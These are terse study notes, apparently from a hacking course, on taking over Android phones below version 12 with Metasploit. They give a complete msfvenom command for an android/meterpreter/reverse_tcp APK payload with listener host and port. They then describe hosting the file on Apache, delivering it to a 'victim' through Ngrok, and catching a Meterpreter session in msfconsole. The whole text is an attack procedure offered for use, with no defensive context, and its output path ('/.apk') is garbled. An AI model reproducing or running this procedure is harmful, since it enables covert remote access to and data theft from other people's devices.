Android Hacking: It is similar to Windows 7 and 10 1. Create a payload. -> msfvenom (Tool) 2. We need to Start the backdoor listening using metasploit -> msfconsole 3. Set a server to send the file to the victim. -> apache server which in built. This work below android version 12. 1. Payload Generation -p -> payload -o -> output windows/meterpreter/reverse_tcp ==> android/meterpreter/reverse_tcp & -f will not come & file extension will be .apk Example: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=4444 -o /.apk 2. Placing it in var/www/html folder 3. Sending the file to vicitim (Ngrok) 4. Setting up the msfconsole. set payload: android/meterpreter/reverse_tcp 5. Getting the meterpreter session